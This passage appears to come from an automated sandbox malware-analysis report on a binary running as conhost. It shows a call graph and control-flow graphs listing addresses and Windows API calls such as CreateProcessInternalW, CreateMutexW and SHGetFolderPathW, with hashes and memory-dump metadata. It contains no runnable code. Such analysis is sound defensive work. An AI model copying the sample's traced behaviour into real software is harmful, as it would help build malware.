7ff6935c27e3 17136->17137 17137->17131 17138 7ff6935cf5f0 74 API calls 17137->17138 17139 7ff6935c27f9 17138->17139 17140 7ff6935cf5f0 74 API calls 17139->17140 17141 7ff6935c2808 17140->17141 17142 7ff6935c285d wcslen 17141->17142 17143 7ff6935c2876 17142->17143 17143->17131 17144 7ff6935cf5f0 74 API calls 17143->17144 17145 7ff6935c28c7 17144->17145 17146 7ff6935cf5f0 74 API calls 17145->17146 17148 7ff6935c28d6 17146->17148 17147 7ff6935c2959 wcslen 17147->17131 17148->17147 17148->17148 17687 7ff6935c3250 17149->17687 17151 7ff6935c3c57 17152 7ff6935c3cf0 17151->17152 17153 7ff6935c3c64 GetFileSize GetProcessHeap HeapAlloc 17151->17153 17152->16387 17154 7ff6935c3cd4 17153->17154 17154->16387 17156 7ff6935c29b3 CreateMutexW GetLastError 17155->17156 17157 7ff6935c29e3 17155->17157 17156->17157 17157->16391 17737 7ff6935c3880 wcslen 17158->17737 17162 7ff6935c3d3e 17162->16391 17164 7ff6935d32dc 17163->17164 17168 7ff6935d33d8 17163->17168 17165 7ff6935d3328 17164->17165 17166 7ff6935d02c0 18 API calls 17164->17166 17165->17075 17167 7ff6935d32e6 17166->17167 17169 7ff6935cf8a0 11 API calls 17167->17169 17168->17075 17170 7ff6935d32f5 17169->17170 17171 7ff6935d3340 17170->17171 17172 7ff6935d32fb 17170->17172 17173 7ff6935d2100 54 API calls 17171->17173 17177 7ff6935d33bb fprintf 17172->17177 17184 7ff6935d3304 17172->17184 17175 7ff6935d3356 17173->17175 17174 7ff6935cfbc0 3 API calls 17176 7ff6935d330c 17174->17176 17175->17168 17178 7ff6935d2100 54 API calls 17175->17178 17199 7ff6935d04d0 17176->17199 17177->17184 17180 7ff6935d3370 17178->17180 17180->17168 17182 7ff6935d2100 54 API calls 17180->17182 17183 7ff6935d338c 17182->17183 17183->17168 17183->17184 17184->17174 17186 7ff6935d2100 54 API calls 17185->17186 17187 7ff6935d463f 17186->17187 17188 7ff6935d466d SetLastError 17187->17188 17188->17074 17190 7ff6935d2100 54 API calls 17189->17190 17191 7ff6935d46b3 17190->17191 17192 7ff6935d4700 realloc 17191->17192 17193 7ff6935d46c7 17191->17193 17194 7ff6935d4720 realloc 17192->17194 17197 7ff6935d46ea 17192->17197 17195 7ff6935d46df SetLastError 17193->17195 17196 7ff6935d4734 17194->17196 17194->17197 17195->17197 17198 7ff6935d474c memset 17196->17198 17197->17084 17198->17193 17200 7ff6935d06d0 17199->17200 17203 7ff6935d04e4 17199->17203 17200->17075 17201 7ff6935d0708 17204 7ff6935d6420 17 API calls 17201->17204 17202 7ff6935d06e0 fprintf 17202->17201 17203->17201 17203->17202 17206 7ff6935d0659 17203->17206 17209 7ff6935d6420 17 API calls 17203->17209 17210 7ff6935d0682 17204->17210 17208 7ff6935cfd90 2 API calls 17206->17208 17207 7ff6935d6420 17 API calls 17207->17210 17208->17210 17209->17203 17210->17207 17211 7ff6935d0690 free 17210->17211 17211->17210 17222 7ff6935cea40 17212->17222 17214 7ff6935c212f memset 17224 7ff6935d95c0 17214->17224 17216 7ff6935c2184 CreateProcessInternalW 17217 7ff6935c2226 17216->17217 17217->17110 17221 7ff6935ef1f6 17218->17221 17256 7ff6935f17c0 17221->17256 17223 7ff6935cea4f 17222->17223 17223->17214 17223->17223 17225 7ff6935d95cf 17224->17225 17226 7ff6935d9610 17224->17226 17231 7ff6935dd850 17225->17231 17228 7ff6935dd850 5 API calls 17226->17228 17230 7ff6935d9625 17228->17230 17230->17216 17232 7ff6935dd87b 17231->17232 17233 7ff6935dd968 17232->17233 17235 7ff6935dd926 17232->17235 17239 7ff6935d95e8 17232->17239 17234 7ff6935dc0d0 5 API calls 17233->17234 17238 7ff6935dd98c 17233->17238 17234->17238 17235->17239 17240 7ff6935dc0d0 17235->17240 17237 7ff6935dc0d0 5 API calls 17237->17238 17238->17237 17238->17239 17239->17216 17241 7ff6935dc0e7 17240->17241 17242 7ff6935dc200 17241->17242 17243 7ff6935dc107 17241->17243 17244 7ff6935dc117 17242->17244 17245 7ff6935dc215 fwprintf 17242->17245 17246 7ff6935dc266 fwprintf 17242->17246 17251 7ff6935dc10c 17243->17251 17252 7ff6935dbc40 17243->17252 17244->17239 17245->17244 17246->17244 17248 7ff6935dc1b0 17248->17244 17249 7ff6935dc1ec fputwc 17248->17249 17249->17248 17250 7ff6935dc163 fputwc 17250->17251 17251->17244 17251->17248 17251->17250 17253 7ff6935dbc50 17252->17253 17254 7ff6935dbc60 17253->17254 17255 7ff6935dbc80 fputwc 17253->17255 17254->17243 17255->17243 17319 7ff6935f0cd0 malloc 17256->17319 17320 7ff6935f0ceb 17319->17320 17321 7ff6935f0d28 17319->17321 17326 7ff6935e9440 17320->17326 17348 7ff6935e2090 17321->17348 17327 7ff6935e9474 17326->17327 17328 7ff6935e9468 strlen 17326->17328 17500 7ff6935e5ec0 17327->17500 17328->17327 17331 7ff6935f1490 17636 7ff6935f1070 17331->17636 17337 7ff6935f14cb 17338 7ff6935f0620 124 API calls 17337->17338 17339 7ff6935f14d8 17338->17339 17671 7ff6935cf000 17339->17671 17342 7ff6935f1020 17343 7ff6935f1050 17342->17343 17344 7ff6935f1037 17342->17344 17344->17343 17345 7ff6935e1f40 124 API calls 17344->17345 17346 7ff6935f1048 17345->17346 17347 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17346->17347 17349 7ff6935cf8a0 11 API calls 17348->17349 17350 7ff6935e20a5 17349->17350 17351 7ff6935e2146 17350->17351 17356 7ff6935e20ad 17350->17356 17389 7ff6935e28c0 17351->17389 17353 7ff6935cfbc0 3 API calls 17354 7ff6935e211c 17353->17354 17355 7ff6935f0cd0 124 API calls 17354->17355 17357 7ff6935e2120 17354->17357 17358 7ff6935e2155 17355->17358 17356->17353 17356->17354 17357->17320 17365 7ff6935f0620 17357->17365 17359 7ff6935f1490 124 API calls 17358->17359 17360 7ff6935e2175 17359->17360 17361 7ff6935e2183 17360->17361 17396 7ff6935f0e00 17360->17396 17411 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17361->17411 17416 7ff6935f0350 17365->17416 17367 7ff6935f0629 17422 7ff6935e17a0 17367->17422 17390 7ff6935f0cd0 123 API calls 17389->17390 17391 7ff6935e28ce 17390->17391 17392 7ff6935f1490 123 API calls 17391->17392 17393 7ff6935e28ee 17392->17393 17394 7ff6935e2910 17393->17394 17395 7ff6935e2900 free 17393->17395 17394->17354 17395->17394 17397 7ff6935f0e14 17396->17397 17412 7ff6935e17e0 17397->17412 17413 7ff6935e17e6 17412->17413 17414 7ff6935f0620 124 API calls 17413->17414 17415 7ff6935e17eb 17414->17415 17417 7ff6935f0380 17416->17417 17418 7ff6935f0364 17416->17418 17432 7ff6935cec00 GetCurrentProcessId 17417->17432 17418->17367 17420 7ff6935f0385 17420->17418 17421 7ff6935cec00 17 API calls 17420->17421 17421->17418 17423 7ff6935e17a9 abort 17422->17423 17424 7ff6935f0d40 17423->17424 17425 7ff6935e17b6 abort 17424->17425 17456 7ff6935f0f50 17425->17456 17427 7ff6935e17c6 17428 7ff6935e17d4 17427->17428 17429 7ff6935f0e00 122 API calls 17427->17429 17465 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17428->17465 17429->17428 17433 7ff6935cec23 CreateMutexA WaitForSingleObject 17432->17433 17435 7ff6935cee76 17433->17435 17436 7ff6935ced36 FindAtomA 17433->17436 17437 7ff6935cea80 6 API calls 17435->17437 17438 7ff6935cedc1 GetAtomNameA 17436->17438 17439 7ff6935ced48 AddAtomA 17436->17439 17440 7ff6935cee82 CloseHandle 17437->17440 17441 7ff6935cee96 17438->17441 17449 7ff6935cedf9 17438->17449 17444 7ff6935cee63 17439->17444 17445 7ff6935ced8c _onexit 17439->17445 17440->17420 17442 7ff6935cea80 6 API calls 17441->17442 17442->17449 17451 7ff6935cea80 GetLastError 17444->17451 17446 7ff6935ced9f ReleaseMutex CloseHandle 17445->17446 17448 7ff6935cedb8 17446->17448 17448->17420 17449->17446 17450 7ff6935cee4e _onexit 17449->17450 17450->17446 17452 7ff6935cea94 17451->17452 17453 7ff6935ceaa0 FormatMessageA 17451->17453 17452->17448 17454 7ff6935cead5 IsDebuggerPresent 17453->17454 17455 7ff6935ceae8 OutputDebugStringA OutputDebugStringA LocalFree 17453->17455 17454->17452 17455->17454 17466 7ff6935f1270 17456->17466 17458 7ff6935f0f86 17458->17427 17459 7ff6935f0f59 17459->17458 17460 7ff6935f0620 124 API calls 17459->17460 17461 7ff6935f0fd1 17460->17461 17462 7ff6935f1010 17461->17462 17485 7ff6935e1f40 17461->17485 17467 7ff6935f1320 17466->17467 17468 7ff6935f1288 17466->17468 17469 7ff6935cec00 17 API calls 17467->17469 17472 7ff6935f129c 17468->17472 17473 7ff6935f12c0 17468->17473 17471 7ff6935f1325 17469->17471 17470 7ff6935f12a5 17470->17459 17471->17468 17471->17473 17477 7ff6935cec00 17 API calls 17471->17477 17472->17470 17474 7ff6935cec00 17 API calls 17472->17474 17473->17470 17475 7ff6935d4620 56 API calls 17473->17475 17476 7ff6935f137d 17474->17476 17478 7ff6935f12d2 17475->17478 17476->17470 17481 7ff6935cec00 17 API calls 17476->17481 17479 7ff6935f133d 17477->17479 17478->17459 17479->17472 17480 7ff6935f1347 17479->17480 17480->17473 17482 7ff6935cec00 17 API calls 17480->17482 17481->17470 17483 7ff6935f1358 17482->17483 17483->17473 17484 7ff6935cec00 17 API calls 17483->17484 17484->17473 17486 7ff6935cf8a0 11 API calls 17485->17486 17490 7ff6935e1f54 17486->17490 17487 7ff6935e205a 17489 7ff6935e28c0 124 API calls 17487->17489 17488 7ff6935e1f83 17492 7ff6935cfbc0 malloc GetCurrentThreadId SetEvent 17488->17492 17491 7ff6935e1fff 17489->17491 17490->17487 17490->17488 17493 7ff6935f0cd0 124 API calls 17491->17493 17496 7ff6935e2003 17491->17496 17492->17491 17494 7ff6935e2069 17493->17494 17495 7ff6935f1490 124 API calls 17494->17495 17497 7ff6935e2089 17495->17497 17496->17427 17498 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17497->17498 17499 7ff6935e208e 17498->17499 17501 7ff6935e5ed3 17500->17501 17502 7ff6935e5ed8 17500->17502 17501->17502 17503 7ff6935e5f3a 17501->17503 17510 7ff6935e6400 17502->17510 17522 7ff6935f16d0 17503->17522 17506 7ff6935e5ee5 17508 7ff6935e5ef7 17506->17508 17509 7ff6935e5f18 memcpy 17506->17509 17508->17331 17509->17508 17511 7ff6935e648e 17510->17511 17512 7ff6935e6417 17510->17512 17513 7ff6935f17c0 124 API calls 17511->17513 17515 7ff6935e6489 17512->17515 17516 7ff6935e6439 17512->17516 17519 7ff6935e649a 17513->17519 17575 7ff6935f1610 17515->17575 17553 7ff6935f0bf0 17516->17553 17517 7ff6935e6469 17517->17506 17520 7ff6935e64bb 17519->17520 17618 7ff6935e78b0 17519->17618 17520->17506 17523 7ff6935f0cd0 124 API calls 17522->17523 17524 7ff6935f16e5 17523->17524 17525 7ff6935e89b0 124 API calls 17524->17525 17526 7ff6935f16f3 17525->17526 17527 7ff6935f1490 124 API calls 17526->17527 17528 7ff6935f1709 17527->17528 17529 7ff6935f1020 124 API calls 17528->17529 17530 7ff6935f1714 17529->17530 17635 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17530->17635 17554 7ff6935f0c01 malloc 17553->17554 17555 7ff6935f0c0e 17554->17555 17557 7ff6935f0c14 17554->17557 17555->17517 17556 7ff6935f0c22 17558 7ff6935f0cd0 121 API calls 17556->17558 17557->17554 17557->17556 17559 7ff6935f0c2c 17558->17559 17560 7ff6935f1490 121 API calls 17559->17560 17561 7ff6935f0c50 malloc 17560->17561 17562 7ff6935f0cae 17561->17562 17563 7ff6935f0c77 17561->17563 17564 7ff6935e2090 121 API calls 17562->17564 17563->17517 17565 7ff6935f0cb8 17564->17565 17565->17563 17566 7ff6935f0620 121 API calls 17565->17566 17567 7ff6935f0cc5 malloc 17566->17567 17569 7ff6935f0ceb 17567->17569 17570 7ff6935f0d28 17567->17570 17569->17517 17571 7ff6935e2090 121 API calls 17570->17571 17572 7ff6935f0d30 17571->17572 17572->17569 17573 7ff6935f0620 121 API calls 17572->17573 17574 7ff6935f0d3a 17573->17574 17576 7ff6935f0cd0 124 API calls 17575->17576 17577 7ff6935f161e 17576->17577 17578 7ff6935f1490 124 API calls 17577->17578 17579 7ff6935f1642 17578->17579 17580 7ff6935f0cd0 124 API calls 17579->17580 17581 7ff6935f165e 17580->17581 17582 7ff6935f1490 124 API calls 17581->17582 17583 7ff6935f1682 17582->17583 17584 7ff6935f0cd0 124 API calls 17583->17584 17585 7ff6935f169e 17584->17585 17586 7ff6935f1490 124 API calls 17585->17586 17587 7ff6935f16c2 17586->17587 17588 7ff6935f0cd0 124 API calls 17587->17588 17589 7ff6935f16e5 17588->17589 17629 7ff6935e89b0 17589->17629 17592 7ff6935f1490 124 API calls 17593 7ff6935f1709 17592->17593 17594 7ff6935f1020 124 API calls 17593->17594 17595 7ff6935f1714 17594->17595 17634 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17595->17634 17619 7ff6935e78f4 17618->17619 17620 7ff6935e78e9 17618->17620 17622 7ff6935e6400 121 API calls 17619->17622 17620->17619 17621 7ff6935e7990 17620->17621 17626 7ff6935e79ae memcpy 17621->17626 17627 7ff6935e7935 17621->17627 17623 7ff6935e7908 17622->17623 17624 7ff6935e7930 17623->17624 17625 7ff6935e7925 memcpy 17623->17625 17624->17627 17628 7ff6935e7981 memcpy 17624->17628 17625->17624 17626->17627 17627->17520 17628->17627 17630 7ff6935e89e4 17629->17630 17631 7ff6935e89d8 strlen 17629->17631 17632 7ff6935e5ec0 123 API calls 17630->17632 17631->17630 17633 7ff6935e89f1 17632->17633 17633->17592 17637 7ff6935f108a 17636->17637 17638 7ff6935f1198 17636->17638 17641 7ff6935f10c8 17637->17641 17650 7ff6935f10a2 17637->17650 17639 7ff6935cec00 17 API calls 17638->17639 17640 7ff6935f119d 17639->17640 17640->17637 17640->17641 17645 7ff6935cec00 17 API calls 17640->17645 17643 7ff6935d4620 56 API calls 17641->17643 17662 7ff6935f10ab 17641->17662 17642 7ff6935cec00 17 API calls 17646 7ff6935f11f5 17642->17646 17644 7ff6935f10de 17643->17644 17647 7ff6935f10e6 malloc 17644->17647 17644->17662 17648 7ff6935f11b5 17645->17648 17653 7ff6935cec00 17 API calls 17646->17653 17646->17662 17649 7ff6935f1121 17647->17649 17658 7ff6935f10fc 17647->17658 17648->17650 17651 7ff6935f11bf 17648->17651 17652 7ff6935f0620 123 API calls 17649->17652 17649->17662 17650->17642 17650->17662 17651->17641 17656 7ff6935cec00 17 API calls 17651->17656 17654 7ff6935f126f 17652->17654 17653->17662 17655 7ff6935f1113 17659 7ff6935d4690 59 API calls 17655->17659 17660 7ff6935f11d0 17656->17660 17657 7ff6935cec00 17 API calls 17657->17658 17658->17655 17658->17657 17661 7ff6935f1257 17658->17661 17659->17649 17660->17641 17663 7ff6935cec00 17 API calls 17660->17663 17661->17655 17664 7ff6935cec00 17 API calls 17661->17664 17665 7ff6935f13b0 17662->17665 17663->17641 17664->17655 17681 7ff6935f0430 17665->17681 17667 7ff6935f13d5 17668 7ff6935f0350 17 API calls 17667->17668 17669 7ff6935f13de 17668->17669 17670 7ff6935cf220 RaiseException 17669->17670 17670->17337 17672 7ff6935cf0ea 17671->17672 17675 7ff6935cf023 17671->17675 17672->17342 17673 7ff6935cf0e0 17673->17672 17674 7ff6935cf1f7 RtlUnwindEx abort 17673->17674 17675->17672 17675->17673 17676 7ff6935cf150 17675->17676 17678 7ff6935cf07d 17675->17678 17676->17672 17677 7ff6935cf0d9 abort 17676->17677 17680 7ff6935cf1aa RtlUnwindEx 17676->17680 17677->17673 17678->17672 17678->17677 17679 7ff6935cf0a9 RaiseException 17678->17679 17679->17677 17680->17677 17682 7ff6935f0460 17681->17682 17685 7ff6935f0444 17681->17685 17683 7ff6935cec00 17 API calls 17682->17683 17684 7ff6935f0465 17683->17684 17684->17685 17686 7ff6935cec00 17 API calls 17684->17686 17685->17667 17686->17685 17688 7ff6935c3285 17687->17688 17689 7ff6935c3498 17687->17689 17691 7ff6935c34a4 17688->17691 17693 7ff6935c32c1 wcslen 17688->17693 17694 7ff6935c3478 memcpy 17688->17694 17690 7ff6935f16d0 124 API calls 17689->17690 17690->17691 17692 7ff6935ef1e0 124 API calls 17691->17692 17695 7ff6935c34c8 17692->17695 17700 7ff6935ed220 17693->17700 17694->17689 17697 7ff6935c3357 wcslen 17699 7ff6935c33ff 17697->17699 17698 7ff6935c32f6 17698->17695 17698->17697 17699->17151 17701 7ff6935ed50e 17700->17701 17702 7ff6935ed25b 17700->17702 17703 7ff6935f17c0 124 API calls 17701->17703 17705 7ff6935ed285 17702->17705 17706 7ff6935ed400 17702->17706 17713 7ff6935ed37b 17702->17713 17704 7ff6935ed51a 17703->17704 17704->17698 17708 7ff6935ed2a3 17705->17708 17710 7ff6935ed32d 17705->17710 17727 7ff6935ef260 17706->17727 17709 7ff6935ed2d8 17708->17709 17711 7ff6935ed2ba memcpy 17708->17711 17714 7ff6935ed2e7 memcpy 17709->17714 17722 7ff6935ed2f6 17709->17722 17710->17713 17717 7ff6935ed349 memcpy 17710->17717 17711->17709 17712 7ff6935ed3ab 17715 7ff6935ed468 17712->17715 17716 7ff6935ed3c9 17712->17716 17712->17722 17713->17712 17718 7ff6935ed392 memcpy 17713->17718 17714->17722 17721 7ff6935ed477 memcpy 17715->17721 17715->17722 17719 7ff6935ed3d2 17716->17719 17720 7ff6935ed4a0 17716->17720 17717->17713 17717->17722 17718->17712 17719->17722 17724 7ff6935ed3e9 memcpy 17719->17724 17723 7ff6935ed4c5 17720->17723 17725 7ff6935ed4b7 memcpy 17720->17725 17721->17722 17722->17698 17723->17722 17726 7ff6935ed4df memcpy 17723->17726 17724->17722 17725->17723 17726->17722 17728 7ff6935ef2aa 17727->17728 17729 7ff6935ef1e0 124 API calls 17728->17729 17730 7ff6935ef2bb 17729->17730 17731 7ff6935ef2d0 memcpy 17730->17731 17733 7ff6935ef2e9 17730->17733 17731->17733 17732 7ff6935ef320 17734 7ff6935ef349 17732->17734 17736 7ff6935ef336 memcpy 17732->17736 17733->17732 17735 7ff6935ef301 memcpy 17733->17735 17734->17722 17735->17732 17736->17734 17738 7ff6935c38b0 17737->17738 17739 7ff6935c38c9 wcscpy 17738->17739 17741 7ff6935c38fc 17738->17741 17756 7ff6935c3550 17739->17756 17742 7ff6935c3910 17741->17742 17743 7ff6935c3941 wcslen 17742->17743 17744 7ff6935c3b80 17742->17744 17745 7ff6935c3b8c 17743->17745 17746 7ff6935c3962 17743->17746 17747 7ff6935f16d0 124 API calls 17744->17747 17748 7ff6935ef1e0 124 API calls 17745->17748 17746->17745 17749 7ff6935c3b60 memcpy 17746->17749 17750 7ff6935c3980 wcslen 17746->17750 17747->17745 17751 7ff6935c3bb3 17748->17751 17749->17744 17752 7ff6935ed220 135 API calls 17750->17752 17754 7ff6935c39b5 17752->17754 17753 7ff6935c3a25 wcslen 17755 7ff6935c3b1b 17753->17755 17754->17751 17754->17753 17755->17162 17757 7ff6935c3581 wcslen 17756->17757 17758 7ff6935c37c0 17756->17758 17759 7ff6935c37cc 17757->17759 17760 7ff6935c35a2 17757->17760 17761 7ff6935f16d0 124 API calls 17758->17761 17762 7ff6935ef1e0 124 API calls 17759->17762 17760->17759 17763 7ff6935c37a0 memcpy 17760->17763 17764 7ff6935c35c0 wcslen 17760->17764 17761->17759 17766 7ff6935c37f3 17762->17766 17763->17758 17765 7ff6935ed220 135 API calls 17764->17765 17768 7ff6935c35f5 17765->17768 17767 7ff6935c3665 wcslen 17769 7ff6935c375b 17767->17769 17768->17766 17768->17767 17769->17738

                        Executed Functions

                        Function 00007FF6935C29F0 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 423stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 38 7ff6935c29f0-7ff6935c2a54 39 7ff6935c316e-7ff6935c31b5 38->39 40 7ff6935c2a5a-7ff6935c2a93 38->40 41 7ff6935c2b4f-7ff6935c2b63 40->41 42 7ff6935c2b30-7ff6935c2b49 41->42 43 7ff6935c2b65-7ff6935c2b68 41->43 42->39 42->41 43->42 44 7ff6935c2b6a-7ff6935c2b75 call 7ff6935cf5f0 43->44 46 7ff6935c2b7a-7ff6935c2b92 call 7ff6935cf5f0 44->46 49 7ff6935c2b94-7ff6935c2bc4 call 7ff6935ce300 46->49 50 7ff6935c2bc9-7ff6935c2bcf 46->50 49->50 52 7ff6935c2bd1-7ff6935c2bf8 50->52 53 7ff6935c2bfe-7ff6935c2c0b _stricmp 50->53 52->53 54 7ff6935c2c11-7ff6935c2d31 call 7ff6935cf5f0 * 12 53->54 55 7ff6935c2a98-7ff6935c2ab9 call 7ff6935cf5f0 * 2 53->55 90 7ff6935c2d38-7ff6935c2d8f 54->90 65 7ff6935c2aed-7ff6935c2af3 55->65 66 7ff6935c2abb-7ff6935c2ae8 call 7ff6935ce300 55->66 67 7ff6935c2af5-7ff6935c2b0e 65->67 68 7ff6935c2b14-7ff6935c2b21 _stricmp 65->68 66->65 67->68 68->54 71 7ff6935c2b27 68->71 71->42 91 7ff6935c2d91-7ff6935c2dcb call 7ff6935ce300 90->91 92 7ff6935c2dd0-7ff6935c2dd4 90->92 91->92 94 7ff6935c2e08-7ff6935c2e15 strcmp 92->94 95 7ff6935c2dd6-7ff6935c2dd8 92->95 96 7ff6935c2e1e-7ff6935c2e49 94->96 97 7ff6935c2e17 94->97 98 7ff6935c2de0-7ff6935c2e02 95->98 100 7ff6935c2e83-7ff6935c2e87 96->100 101 7ff6935c2e4b-7ff6935c2e7e call 7ff6935ce300 96->101 97->96 98->98 99 7ff6935c2e04 98->99 99->94 103 7ff6935c2e89-7ff6935c2e95 100->103 104 7ff6935c2eba-7ff6935c2ec7 strcmp 100->104 101->100 105 7ff6935c2e98-7ff6935c2eb4 103->105 106 7ff6935c2ed0-7ff6935c2ef6 104->106 107 7ff6935c2ec9 104->107 105->105 108 7ff6935c2eb6 105->108 109 7ff6935c2f2e-7ff6935c2f32 106->109 110 7ff6935c2ef8-7ff6935c2f29 call 7ff6935ce300 106->110 107->106 108->104 111 7ff6935c2f61-7ff6935c2f6e strcmp 109->111 112 7ff6935c2f34-7ff6935c2f3e 109->112 110->109 115 7ff6935c2f70 111->115 116 7ff6935c2f77-7ff6935c2f9c 111->116 114 7ff6935c2f40-7ff6935c2f5b 112->114 114->114 117 7ff6935c2f5d 114->117 115->116 118 7ff6935c2f9e-7ff6935c2fcf call 7ff6935ce300 116->118 119 7ff6935c2fd4-7ff6935c2fd8 116->119 117->111 118->119 121 7ff6935c3011-7ff6935c301e strcmp 119->121 122 7ff6935c2fda-7ff6935c2fe6 119->122 124 7ff6935c3020 121->124 125 7ff6935c3027-7ff6935c3042 121->125 123 7ff6935c2ff0-7ff6935c300b 122->123 123->123 126 7ff6935c300d 123->126 124->125 127 7ff6935c3044-7ff6935c3072 call 7ff6935ce300 125->127 128 7ff6935c3077-7ff6935c307d 125->128 126->121 127->128 130 7ff6935c307f-7ff6935c308b 128->130 131 7ff6935c30b4-7ff6935c30c1 strcmp 128->131 132 7ff6935c3090-7ff6935c30ac 130->132 133 7ff6935c30c3 131->133 134 7ff6935c30ca-7ff6935c30d2 131->134 132->132 135 7ff6935c30ae 132->135 133->134 136 7ff6935c3105-7ff6935c310a 134->136 137 7ff6935c30d4-7ff6935c3100 call 7ff6935ce300 134->137 135->131 139 7ff6935c3134-7ff6935c3141 strcmp 136->139 140 7ff6935c310c-7ff6935c312f 136->140 137->136 141 7ff6935c3143 139->141 142 7ff6935c314a-7ff6935c315e 139->142 140->139 141->142 142->42 143 7ff6935c3164-7ff6935c3169 142->143 143->90
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strcmp$_stricmp
                        • String ID: KF $y$}
                        • API String ID: 3398372305-1747734038
                        • Opcode ID: c4f4c2f7a25e560a8a19292323215d9eaefe0a90f89513e6a38fedf744fe5a7d
                        • Instruction ID: d4f29b6e4cdc15710aed42a143621a0b9dbe8d64064f2d40dfa9c279b290a152
                        • Opcode Fuzzy Hash: c4f4c2f7a25e560a8a19292323215d9eaefe0a90f89513e6a38fedf744fe5a7d
                        • Instruction Fuzzy Hash: 21229266A08BC185EB31CB29E4063BA77A8FF59788F4491B5DA8C93756EF7CD144C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C15C0 Relevance: 11.1, APIs: 7, Instructions: 557synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 273 7ff6935c15c0-7ff6935c169a call 7ff6935c29f0 call 7ff6935cf5f0 * 2 280 7ff6935c16bf-7ff6935c16c3 273->280 281 7ff6935c169c-7ff6935c16ba call 7ff6935ce300 273->281 283 7ff6935c16c5-7ff6935c16cf 280->283 284 7ff6935c16f4-7ff6935c178e CreateMutexW SHGetFolderPathW call 7ff6935cf5f0 * 2 280->284 281->280 285 7ff6935c16d1-7ff6935c16ee 283->285 291 7ff6935c1790-7ff6935c17b4 call 7ff6935ce300 284->291 292 7ff6935c17b9-7ff6935c17bf 284->292 285->285 287 7ff6935c16f0 285->287 287->284 291->292 294 7ff6935c17c1-7ff6935c17cb 292->294 295 7ff6935c17f2-7ff6935c1877 wcscat SHGetFolderPathW call 7ff6935cf5f0 * 2 292->295 296 7ff6935c17cd-7ff6935c17ea 294->296 302 7ff6935c18a1-7ff6935c18a7 295->302 303 7ff6935c1879-7ff6935c189c call 7ff6935ce300 295->303 296->296 298 7ff6935c17ec 296->298 298->295 305 7ff6935c18a9-7ff6935c18d4 302->305 306 7ff6935c18da-7ff6935c1917 wcscat call 7ff6935c2250 call 7ff6935cf5f0 * 2 302->306 303->302 305->306 313 7ff6935c1919-7ff6935c1936 call 7ff6935ce300 306->313 314 7ff6935c193b-7ff6935c193f 306->314 313->314 316 7ff6935c1941-7ff6935c1944 call 7ff6935c1560 314->316 317 7ff6935c1949-7ff6935c19b0 call 7ff6935cf5f0 * 2 314->317 316->317 323 7ff6935c19b2-7ff6935c19d1 call 7ff6935ce300 317->323 324 7ff6935c19d6-7ff6935c19dc 317->324 323->324 326 7ff6935c19de-7ff6935c19e1 call 7ff6935c1580 324->326 327 7ff6935c19e6-7ff6935c1a0f call 7ff6935cf5f0 * 2 324->327 326->327 333 7ff6935c1a11-7ff6935c1a2e call 7ff6935ce300 327->333 334 7ff6935c1a33-7ff6935c1a37 327->334 333->334 336 7ff6935c1a41-7ff6935c1a9a call 7ff6935cf5f0 * 2 334->336 337 7ff6935c1a39-7ff6935c1a3c call 7ff6935c1560 334->337 343 7ff6935c1ac0-7ff6935c1ac6 336->343 344 7ff6935c1a9c-7ff6935c1abb call 7ff6935ce300 336->344 337->336 346 7ff6935c1ad0-7ff6935c1bca call 7ff6935c3c40 call 7ff6935cf5f0 343->346 347 7ff6935c1ac8-7ff6935c1acb call 7ff6935c1580 343->347 344->343 353 7ff6935c1bf1-7ff6935c1c12 call 7ff6935c4172 call 7ff6935cf5f0 346->353 347->346 358 7ff6935c1c15-7ff6935c1c1d 353->358 359 7ff6935c1c1f-7ff6935c1c39 call 7ff6935ce300 358->359 360 7ff6935c1c3e-7ff6935c1c43 358->360 359->360 362 7ff6935c1c45-7ff6935c1c53 360->362 363 7ff6935c1c58-7ff6935c1c71 _wcsicmp 360->363 362->363 364 7ff6935c1c90-7ff6935c1c9b call 7ff6935c29a0 363->364 365 7ff6935c1c73-7ff6935c1c76 363->365 364->365 370 7ff6935c1c9d-7ff6935c1ca0 364->370 366 7ff6935c1bd0-7ff6935c1be2 365->366 367 7ff6935c1c7c-7ff6935c1c85 365->367 372 7ff6935c1be8-7ff6935c1beb 366->372 373 7ff6935c1cca-7ff6935c1d70 call 7ff6935cf5f0 * 2 366->373 367->358 374 7ff6935c1ca2-7ff6935c1cae 370->374 375 7ff6935c1cb8-7ff6935c1cc7 GetFileAttributesW 370->375 372->353 372->373 380 7ff6935c1e22-7ff6935c1e29 373->380 381 7ff6935c1d76-7ff6935c1e1d call 7ff6935ce300 373->381 374->358 375->373 383 7ff6935c1e65-7ff6935c1e71 call 7ff6935c2120 380->383 384 7ff6935c1e2b-7ff6935c1e37 380->384 381->380 388 7ff6935c1e76-7ff6935c1eb2 call 7ff6935cf5f0 * 2 383->388 387 7ff6935c1e40-7ff6935c1e5c 384->387 387->387 389 7ff6935c1e5e 387->389 394 7ff6935c1f0f-7ff6935c1f16 388->394 395 